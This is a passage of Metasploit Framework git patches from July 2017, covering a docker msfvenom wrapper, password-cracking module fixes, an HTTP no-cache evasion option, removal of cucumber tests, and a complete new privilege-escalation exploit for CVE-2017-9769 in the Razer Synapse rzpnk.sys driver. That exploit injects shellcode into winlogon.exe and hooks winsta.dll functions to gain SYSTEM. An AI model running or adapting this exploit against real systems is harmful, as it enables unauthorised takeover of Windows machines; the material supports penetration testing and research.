are not inside the project + realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;} + + # determine script path + pushd $(dirname $(realpath $0)) > /dev/null + path=$(pwd) + popd > /dev/null + fi + MSF_PATH=$(dirname $(dirname $path)) +fi + +cd $MSF_PATH + +if [[ -n "$MSF_BUILD" ]]; then + docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build +fi + +docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@" diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index dd46fa433e..cb1e8596af 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -24,7 +24,9 @@ Gem::Specification.new do |spec| spec.homepage = 'https://www.metasploit.com' spec.license = 'BSD-3-clause' - if File.directory?(File.join(File.dirname(__FILE__), ".git")) + # only do a git ls-files if the .git folder exists and we have a git binary in PATH + if File.directory?(File.join(File.dirname(__FILE__), ".git")) && + ENV['PATH'].split(':').collect {|d| Dir.entries d if Dir.exists? d}.flatten.include?("git") spec.files = `git ls-files`.split($/).reject { |file| file =~ /^documentation|^external/ } From fe360e3e2acc81e1f9bcc6a50a1e2c9ee77a093d Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 10 Jul 2017 11:18:20 -0500 Subject: [PATCH 20/63] Fix #8685, Check nil condition for #wordlist_file in jtr modules JTR modules should never assume there is always a database connected while using #wordlist_file, considering a database is an optional component for Framework. Fix #8685 --- modules/auxiliary/analyze/jtr_aix.rb | 5 +++++ modules/auxiliary/analyze/jtr_crack_fast.rb | 5 +++++ modules/auxiliary/analyze/jtr_linux.rb | 5 +++++ modules/auxiliary/analyze/jtr_mssql_fast.rb | 5 +++++ modules/auxiliary/analyze/jtr_mysql_fast.rb | 5 +++++ modules/auxiliary/analyze/jtr_postgres_fast.rb | 5 +++++ 6 files changed, 30 insertions(+) diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 18b8515040..f3c42045fd 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -32,6 +32,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index b3ab197ca6..96f57bef69 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index a49d2f14c4..04a4cd83a0 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -46,6 +46,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 787f0de29a..5ab7e96c0f 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -33,6 +33,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index cb4e6a7a30..af8c4fe11c 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -32,6 +32,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index 7fdab976d5..da34fdf0b6 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -36,6 +36,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close From 53d5060fbdd8297c5d6d1d6c7673cfc8eb026cec Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Mon, 10 Jul 2017 16:57:23 -0400 Subject: [PATCH 21/63] Add the LPE for CVE-2017-9769 --- .../windows/local/razer_zwopenprocess.rb | 247 ++++++++++++++++++ 1 file changed, 247 insertions(+) create mode 100644 modules/exploits/windows/local/razer_zwopenprocess.rb diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb new file mode 100644 index 0000000000..177a06424b --- /dev/null +++ b/modules/exploits/windows/local/razer_zwopenprocess.rb @@ -0,0 +1,247 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/windows_kernel' +require 'rex' +require 'metasm' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Local::WindowsKernel + include Msf::Post::Windows::Priv + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Razer Synapse rzpnk.sys IOCTL', + 'Description' => %q{ + A vulnerability exists in the latest version of Razer Synapse + (v2.20.17.302) which can be leveraged locally by a malicious application + to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The + vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver + that passes a PID specified by the user to ZwOpenProcess. This can be + issued by an application to open a handle to an arbitrary process with + the necessary privileges to allocate, read and write memory in the + specified process. + + This exploit leverages this vulnerability to open a handle to the + winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by + installing hooks to execute attacker controlled shellcode. These hooks + are then triggered on demand by calling user32!LockWorkStation(), + resulting in the attacker's payload being executed with the privileges + of the infected winlogon process. In order for the issued IOCTL to work, + the RazerIngameEngine.exe process must not be running. This exploit will + check if it is, and attempt to kill it as necessary. + + The vulnerable software can be found here: + https://www.razerzone.com/synapse/. No Razer hardware needs to be + connected in order to leverage this vulnerability. + + This exploit is not opsec-safe due to the user being logged out as part + of the exploitation process. + }, + 'Author' => 'Spencer McIntyre', + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', 'CVE-2017-9769'], + #['URL', ''], + ], + 'Platform' => 'win', + 'Targets' => + [ + # Tested on (64 bits): + # * Windows 7 SP1 + # * Windows 10.0.14385 + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'DefaultTarget' => 0, + 'Privileged' => true, + 'DisclosureDate' => 'Mar 22 2017')) + end + + def check + pid = session.sys.process['RazerIngameEngine.exe'] + session.sys.process.kill(pid) unless pid.nil? + + pid = session.sys.process['winlogon.exe'] + handle = get_handle(pid) + return Exploit::CheckCode::Safe if handle.nil? + + session.railgun.kernel32.CloseHandle(handle) + Exploit::CheckCode::Vulnerable + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] =~ /wow64/i + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 + fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + end + + pid = session.sys.process['RazerIngameEngine.exe'] + unless pid.nil? + # if this process is running, the IOCTL won't work but the process runs + # with user privileges so we can kill it + print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") + session.sys.process.kill(pid) + end + + pid = session.sys.process['winlogon.exe'] + print_status("Found winlogon.exe pid: #{pid}") + + handle = get_handle(pid) + fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil? + + winlogon = session.sys.process.new(pid, handle) + shellcode_address = winlogon.memory.allocate(4096) + winlogon.memory.protect(shellcode_address) + print_good("Allocated 4096 bytes in winlogon.exe at 0x#{shellcode_address.to_s(16)}") + winlogon.memory.write(shellcode_address, payload.encoded) + hook_stub_address = shellcode_address + payload.encoded.length + + result = session.railgun.kernel32.LoadLibraryA('winsta') + fail_with(Failure::Unknown, 'Failed to get a handle to winsta.dll') if result['return'] == 0 + winsta_handle = result['return'] + + # resolve and backup the functions that we'll install trampolines in + winsta_trampolines = {} # address => original chunk + winsta_functions = ['_WinStationWaitForConnect', 'WinStationIsSessionRemoteable'] + winsta_functions.each do |function| + address = get_address(winsta_handle, function) + winlogon.memory.protect(address) + winsta_trampolines[function] = { + address: address, + original: winlogon.memory.read(address, 24) + } + end + + # generate and install the hook asm + hook_stub = get_hook(shellcode_address, winsta_trampolines) + fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil? + winlogon.memory.write(hook_stub_address, hook_stub) + vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon.exe at 0x#{hook_stub_address}") + + # install the asm trampolines to jump to the hook + winsta_trampolines.each do |function, trampoline_info| + address = trampoline_info[:address] + trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{ + mov rax, 0x#{address.to_s(16)} + push rax + mov rax, 0x#{hook_stub_address.to_s(16)} + jmp rax + }).encode_string + winlogon.memory.write(address, trampoline) + vprint_status("Installed winsta!#{address} trampoline at 0x#{address.to_s(16)}") + end + + session.railgun.user32.LockWorkStation() + session.railgun.kernel32.CloseHandle(handle) + end + + def get_address(dll_handle, function_name) + result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name) + fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0 + result['return'] + end + + # this is where the actual vulnerability is leveraged + def get_handle(pid) + handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') + return nil unless handle + vprint_status('Successfully opened a handle to the driver') + + buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL') + + session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[ + ['DWORD', 'FileHandle', 'in' ], + ['DWORD', 'Event', 'in' ], + ['LPVOID', 'ApcRoutine', 'in' ], + ['LPVOID', 'ApcContext', 'in' ], + ['PDWORD', 'IoStatusBlock', 'out'], + ['DWORD', 'IoControlCode', 'in' ], + ['PBLOB', 'InputBuffer', 'in' ], + ['DWORD', 'InputBufferLength', 'in' ], + ['PBLOB', 'OutputBuffer', 'out'], + ['DWORD', 'OutputBufferLength', 'in' ], + ]) + result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length) + return nil if result['return'] != 0 + session.railgun.kernel32.CloseHandle(handle) + + result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1] + end + + def get_hook(shellcode_address, restore) + dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return'] + return nil if dll_handle == 0 + create_thread_address = get_address(dll_handle, 'CreateThread') + + stub = %{ + call main + ; restore the functions where the trampolines were installed + push rbx + } + + restore.each do |function, trampoline_info| + original = trampoline_info[:original].unpack('Q*') + stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}" + original.each do |chunk| + stub << %{ + mov rbx, 0x#{chunk.to_s(16)} + mov qword ptr ds:[rax], rbx + add rax, 8 + } + end + end + + stub << %{ + pop rbx + ret + + main: + ; backup registers we're going to mangle + push r9 + push r8 + push rdx + push rcx + + ; setup the arguments for the call to CreateThread + xor rax, rax + push rax ; lpThreadId + push rax ; dwCreationFlags + xor r9, r9 ; lpParameter + mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress + xor rdx, rdx ; dwStackSize + xor rcx, rcx ; lpThreadAttributes + mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread + + call rax + add rsp, 16 + + ; restore arguments that were mangled + pop rcx + pop rdx + pop r8 + pop r9 + ret + } + print_line(stub) + Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string + end +end From 50b1ec4044a652e21a81e843189ddc364e8a7115 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 10 Jul 2017 16:05:09 -0500 Subject: [PATCH 22/63] Fix #8675, Add Cache-Control header, also meta tag for BAP2 Hopefully that browsers will respect this. Fix #8675 --- lib/msf/core/exploit/browser_autopwn2.rb | 1 + lib/msf/core/exploit/http/server.rb | 5 +++++ modules/auxiliary/gather/browser_info.rb | 2 +- 3 files changed, 7 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/browser_autopwn2.rb b/lib/msf/core/exploit/browser_autopwn2.rb index 7270a03639..b5a0bdc4a4 100644 --- a/lib/msf/core/exploit/browser_autopwn2.rb +++ b/lib/msf/core/exploit/browser_autopwn2.rb @@ -810,6 +810,7 @@ module Msf %Q| + diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 14d77f7601..ba95ccd85a 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -32,6 +32,7 @@ module Exploit::Remote::HttpServer register_evasion_options( [ + OptBool.new('HTTP::no_cache', [false, 'Disallow the browser to cache HTTP content', false]), OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), @@ -558,6 +559,10 @@ module Exploit::Remote::HttpServer response.headers.junk_headers = 1 end + if datastore['HTTP::no_cache'] + response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate' + end + headers.each_pair { |k,v| response[k] = v } cli.send_response(response) diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb index 35dbb77416..0f386db4f8 100644 --- a/modules/auxiliary/gather/browser_info.rb +++ b/modules/auxiliary/gather/browser_info.rb @@ -74,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary def on_request_exploit(cli, req, target_info) print_target_info(cli, target_info) - send_not_found(cli) + send_response(cli, '') end def run From dbef4ee816c8f49df850215c66b105e21e44b08f Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 12 Jul 2017 08:00:29 -0500 Subject: [PATCH 23/63] kill cucumber in framework --- .travis.yml | 2 - Gemfile | 8 - Gemfile.lock | 48 ------ LICENSE_GEMS | 79 +++++---- features/commands/help.feature | 111 ------------- .../exploit/smb/ms08_067_netapi.feature | 48 ------ features/msfconsole/database_yml.feature | 153 ------------------ .../step_definitions/environment_variables.rb | 20 --- features/step_definitions/project.rb | 14 -- features/support/bin/stty | 26 --- features/support/env.rb | 34 ---- features/support/hooks.rb | 39 ----- features/support/simplecov_setup.rb | 16 -- features/support/stty.rb | 11 -- features/support/targets.yml.example | 7 - lib/metasploit/framework/database/cucumber.rb | 36 ----- lib/tasks/cucumber.rake | 74 --------- lib/tasks/custom_cucumber.rake | 30 ---- script/cucumber | 10 -- 19 files changed, 37 insertions(+), 729 deletions(-) delete mode 100644 features/commands/help.feature delete mode 100644 features/modules/exploit/smb/ms08_067_netapi.feature delete mode 100644 features/msfconsole/database_yml.feature delete mode 100644 features/step_definitions/environment_variables.rb delete mode 100644 features/step_definitions/project.rb delete mode 100755 features/support/bin/stty delete mode 100644 features/support/env.rb delete mode 100644 features/support/hooks.rb delete mode 100644 features/support/simplecov_setup.rb delete mode 100644 features/support/stty.rb delete mode 100644 features/support/targets.yml.example delete mode 100644 lib/metasploit/framework/database/cucumber.rb delete mode 100644 lib/tasks/cucumber.rake delete mode 100644 lib/tasks/custom_cucumber.rake delete mode 100755 script/cucumber diff --git a/.travis.yml b/.travis.yml index b6894b2597..28f0b510f7 100644 --- a/.travis.yml +++ b/.travis.yml @@ -16,8 +16,6 @@ rvm: - '2.4.1' env: -# TODO: restore these tests when the code passes them! -# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"' diff --git a/Gemfile b/Gemfile index 09fe9ccc85..4dbdbacb6d 100755 --- a/Gemfile +++ b/Gemfile @@ -37,14 +37,6 @@ group :development, :test do end group :test do - # cucumber extension for testing command line applications, like msfconsole - gem 'aruba' - # cucumber + automatic database cleaning with database_cleaner - gem 'cucumber-rails', :require => false - gem 'shoulda-matchers' # Manipulate Time.now in specs gem 'timecop' - # Needed to work around a regression between capybara 2.7.1 and xpath 2.1 - # XXX remove when capybara is updated to work with xpath 2.1 - gem 'xpath', '2.0' end diff --git a/Gemfile.lock b/Gemfile.lock index 7ae575d049..6da285dbd2 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -102,46 +102,12 @@ GEM arel (6.0.4) arel-helpers (2.4.0) activerecord (>= 3.1.0, < 6) - aruba (0.14.2) - childprocess (~> 0.5.6) - contracts (~> 0.9) - cucumber (>= 1.3.19) - ffi (~> 1.9.10) - rspec-expectations (>= 2.99) - thor (~> 0.19) backports (3.8.0) bcrypt (3.1.11) bindata (2.4.0) bit-struct (0.16) builder (3.2.3) - capybara (2.14.4) - addressable - mime-types (>= 1.16) - nokogiri (>= 1.3.3) - rack (>= 1.0.0) - rack-test (>= 0.5.4) - xpath (~> 2.0) - childprocess (0.5.9) - ffi (~> 1.0, >= 1.0.11) coderay (1.1.1) - contracts (0.16.0) - cucumber (2.4.0) - builder (>= 2.1.2) - cucumber-core (~> 1.5.0) - cucumber-wire (~> 0.0.1) - diff-lcs (>= 1.1.3) - gherkin (~> 4.0) - multi_json (>= 1.7.5, < 2.0) - multi_test (>= 0.1.2) - cucumber-core (1.5.0) - gherkin (~> 4.0) - cucumber-rails (1.5.0) - capybara (>= 1.1.2, < 3) - cucumber (>= 1.3.8, < 4) - mime-types (>= 1.17, < 4) - nokogiri (~> 1.5) - railties (>= 4, < 5.2) - cucumber-wire (0.0.1) diff-lcs (1.3) dnsruby (1.60.1) docile (1.1.5) @@ -153,10 +119,8 @@ GEM railties (>= 3.0.0) faraday (0.12.1) multipart-post (>= 1.2, < 3) - ffi (1.9.18) filesize (0.1.1) fivemat (1.3.5) - gherkin (4.1.3) google-protobuf (3.3.0) googleauth (0.5.1) faraday (~> 0.9) @@ -216,14 +180,10 @@ GEM recog (~> 2.0) metasploit_payloads-mettle (0.1.10) method_source (0.8.2) - mime-types (3.1) - mime-types-data (~> 3.2015) - mime-types-data (3.2016.0521) mini_portile2 (2.2.0) minitest (5.10.2) msgpack (1.1.0) multi_json (1.12.1) - multi_test (0.1.2) multipart-post (2.0.0) nessus_rest (0.1.6) net-ssh (4.1.0) @@ -358,8 +318,6 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) - shoulda-matchers (3.1.1) - activesupport (>= 4.0.0) signet (0.7.3) addressable (~> 2.3) faraday (~> 0.9) @@ -386,16 +344,12 @@ GEM activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - xpath (2.0.0) - nokogiri (~> 1.3) yard (0.9.9) PLATFORMS ruby DEPENDENCIES - aruba - cucumber-rails factory_girl_rails fivemat metasploit-aggregator @@ -406,10 +360,8 @@ DEPENDENCIES redcarpet rspec-rails rspec-rerun - shoulda-matchers simplecov timecop - xpath (= 2.0) yard BUNDLED WITH diff --git a/LICENSE_GEMS b/LICENSE_GEMS index a4e325a2cf..2fe90885c5 100644 --- a/LICENSE_GEMS +++ b/LICENSE_GEMS @@ -1,71 +1,62 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh -actionpack, 4.2.8, MIT -actionview, 4.2.8, MIT -activemodel, 4.2.8, MIT -activerecord, 4.2.8, MIT -activesupport, 4.2.8, MIT +Ascii85, 1.0.2, MIT +actionpack, 4.2.9, MIT +actionview, 4.2.9, MIT +activemodel, 4.2.9, MIT +activerecord, 4.2.9, MIT +activesupport, 4.2.9, MIT addressable, 2.5.1, "Apache 2.0" +afm, 0.2.2, MIT arel, 6.0.4, MIT arel-helpers, 2.4.0, unknown -aruba, 0.14.2, MIT backports, 3.8.0, MIT bcrypt, 3.1.11, MIT bindata, 2.4.0, ruby bit-struct, 0.16, ruby builder, 3.2.3, MIT -bundler, 1.15.0, MIT -capybara, 2.14.0, MIT -childprocess, 0.5.9, MIT +bundler, 1.15.1, MIT coderay, 1.1.1, MIT -contracts, 0.16.0, "Simplified BSD" -cucumber, 2.4.0, MIT -cucumber-core, 1.5.0, MIT -cucumber-rails, 1.5.0, MIT -cucumber-wire, 0.0.1, MIT diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+" +dnsruby, 1.60.1, "Apache 2.0" docile, 1.1.5, MIT erubis, 2.7.0, MIT factory_girl, 4.8.0, MIT factory_girl_rails, 4.8.0, MIT faraday, 0.12.1, MIT -ffi, 1.9.18, "New BSD" filesize, 0.1.1, MIT -fivemat, 1.3.3, MIT -gherkin, 4.1.3, MIT +fivemat, 1.3.5, MIT google-protobuf, 3.3.0, "New BSD" googleauth, 0.5.1, "Apache 2.0" -grpc, 1.3.4, "New BSD" -i18n, 0.8.1, MIT +grpc, 1.4.1, "New BSD" +hashery, 2.1.2, "Simplified BSD" +i18n, 0.8.6, MIT jsobfu, 0.4.2, "New BSD" json, 2.1.0, ruby jwt, 1.5.6, MIT little-plugger, 1.1.4, MIT logging, 2.2.2, MIT loofah, 2.0.3, MIT -memoist, 0.15.0, MIT +memoist, 0.16.0, MIT metasm, 1.0.3, LGPL metasploit-aggregator, 0.2.1, "New BSD" -metasploit-concern, 2.0.4, "New BSD" -metasploit-credential, 2.0.9, "New BSD" -metasploit-framework, 4.14.23, "New BSD" +metasploit-concern, 2.0.5, "New BSD" +metasploit-credential, 2.0.10, "New BSD" +metasploit-framework, 4.15.0, "New BSD" metasploit-model, 2.0.4, "New BSD" -metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD" -metasploit_data_models, 2.0.14, "New BSD" -metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD" +metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD" +metasploit_data_models, 2.0.15, "New BSD" +metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD" method_source, 0.8.2, MIT -mime-types, 3.1, MIT -mime-types-data, 3.2016.0521, MIT -mini_portile2, 2.1.0, MIT +mini_portile2, 2.2.0, MIT minitest, 5.10.2, MIT msgpack, 1.1.0, "Apache 2.0" multi_json, 1.12.1, MIT -multi_test, 0.1.2, MIT multipart-post, 2.0.0, MIT nessus_rest, 0.1.6, MIT net-ssh, 4.1.0, MIT network_interface, 0.0.1, MIT -nexpose, 6.0.0, BSD -nokogiri, 1.7.2, MIT +nexpose, 6.1.0, BSD +nokogiri, 1.8.0, MIT octokit, 4.7.0, MIT openssl-ccm, 1.2.1, MIT openvas-omp, 0.0.4, MIT @@ -73,6 +64,7 @@ os, 0.9.6, MIT packetfu, 1.1.13, BSD patch_finder, 1.0.2, "New BSD" pcaprub, 0.12.4, LGPL-2.1 +pdf-reader, 2.0.0, MIT pg, 0.20.0, "New BSD" pg_array_parser, 0.0.9, unknown postgres_ext, 3.0.0, MIT @@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT rails-deprecated_sanitizer, 1.0.3, MIT rails-dom-testing, 1.0.8, MIT rails-html-sanitizer, 1.0.3, MIT -railties, 4.2.8, MIT +railties, 4.2.9, MIT rake, 12.0.0, MIT rb-readline, 0.5.4, BSD -recog, 2.1.8, unknown +recog, 2.1.11, unknown redcarpet, 3.4.0, MIT -rex-arch, 0.1.4, "New BSD" -rex-bin_tools, 0.1.3, "New BSD" -rex-core, 0.1.10, "New BSD" +rex-arch, 0.1.9, "New BSD" +rex-bin_tools, 0.1.4, "New BSD" +rex-core, 0.1.11, "New BSD" rex-encoder, 0.1.4, "New BSD" rex-exploitation, 0.1.14, "New BSD" rex-java, 0.1.5, "New BSD" @@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD" rex-random_identifier, 0.1.2, "New BSD" rex-registry, 0.1.3, "New BSD" rex-rop_builder, 0.1.3, "New BSD" -rex-socket, 0.1.6, "New BSD" +rex-socket, 0.1.8, "New BSD" rex-sslscan, 0.1.4, "New BSD" rex-struct2, 0.1.2, "New BSD" rex-text, 0.2.15, "New BSD" rex-zip, 0.1.3, "New BSD" rkelly-remix, 0.0.7, MIT robots, 0.10.1, MIT +rspec, 3.6.0, MIT rspec-core, 3.6.0, MIT rspec-expectations, 3.6.0, MIT rspec-mocks, 3.6.0, MIT rspec-rails, 3.6.0, MIT +rspec-rerun, 1.1.0, MIT rspec-support, 3.6.0, MIT -ruby_smb, 0.0.17, "New BSD" +ruby-rc4, 0.1.5, MIT +ruby_smb, 0.0.18, "New BSD" rubyntlm, 0.6.2, MIT rubyzip, 1.2.1, "Simplified BSD" sawyer, 0.8.1, MIT -shoulda-matchers, 3.1.1, MIT signet, 0.7.3, "Apache 2.0" simplecov, 0.14.1, MIT simplecov-html, 0.10.1, MIT @@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD" sshkey, 1.9.0, MIT thor, 0.19.4, MIT thread_safe, 0.3.6, "Apache 2.0" -timecop, 0.8.1, MIT +timecop, 0.9.1, MIT +ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0" tzinfo, 1.2.3, MIT tzinfo-data, 1.2017.2, MIT windows_error, 0.1.2, BSD +xdr, 2.0.0, "Apache 2.0" xmlrpc, 0.3.0, ruby -xpath, 2.1.0, MIT yard, 0.9.9, MIT diff --git a/features/commands/help.feature b/features/commands/help.feature deleted file mode 100644 index f73763436b..0000000000 --- a/features/commands/help.feature +++ /dev/null @@ -1,111 +0,0 @@ -Feature: Help command - - Background: - Given I run `msfconsole --defer-module-loads -q -x help -x exit` - - Scenario: The 'help' command's output - Then the output should contain: - """ - Core Commands - ============= - - Command Description - ------- ----------- - ? Help menu - banner Display an awesome metasploit banner - cd Change the current working directory - color Toggle color - connect Communicate with a host - exit Exit the console - get Gets the value of a context-specific variable - getg Gets the value of a global variable - grep Grep the output of another command - help Help menu - history Show command history - irb Drop into irb scripting mode - load Load a framework plugin - quit Exit the console - route Route traffic through a session - save Saves the active datastores - sessions Dump session listings and display information about sessions - set Sets a context-specific variable to a value - setg Sets a global variable to a value - sleep Do nothing for the specified number of seconds - spool Write console output into a file as well the screen - threads View and manipulate background threads - unload Unload a framework plugin - unset Unsets one or more context-specific variables - unsetg Unsets one or more global variables - version Show the framework and console library version numbers - - - Module Commands - =============== - - Command Description - ------- ----------- - advanced Displays advanced options for one or more modules - back Move back from the current context - edit Edit the current module with the preferred editor - info Displays information about one or more modules - loadpath Searches for and loads modules from a path - options Displays global options or for one or more modules - popm Pops the latest module off the stack and makes it active - previous Sets the previously loaded module as the current module - pushm Pushes the active or list of modules onto the module stack - reload_all Reloads all modules from all defined module paths - search Searches module names and descriptions - show Displays modules of a given type, or all modules - use Selects a module by name - - - Job Commands - ============ - - Command Description - ------- ----------- - handler Start a payload handler as job - jobs Displays and manages jobs - kill Kill a job - rename_job Rename a job - - - Resource Script Commands - ======================== - - Command Description - ------- ----------- - makerc Save commands entered since start to a file - resource Run the commands stored in a file - - - Database Backend Commands - ========================= - - Command Description - ------- ----------- - db_connect Connect to an existing database - db_disconnect Disconnect from the current database instance - db_export Export a file containing the contents of the database - db_import Import a scan result file (filetype will be auto-detected) - db_nmap Executes nmap and records the output automatically - db_rebuild_cache Rebuilds the database-stored module cache - db_status Show the current database status - hosts List all hosts in the database - loot List all loot in the database - notes List all notes in the database - services List all services in the database - vulns List all vulnerabilities in the database - workspace Switch between database workspaces - - - Credentials Backend Commands - ============================ - - Command Description - ------- ----------- - creds List all credentials in the database - - - """ - diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature deleted file mode 100644 index 940ff2a4e6..0000000000 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ /dev/null @@ -1,48 +0,0 @@ -@targets @db -Feature: MS08-067 netapi - - Background: - Given a directory named "home" - And I cd to "home" - And a mocked home directory - - Scenario: The MS08-067 should get a session with bind_tcp - Given I ready the windows targets - Given a file named "ms08-067-bind.rc" with: 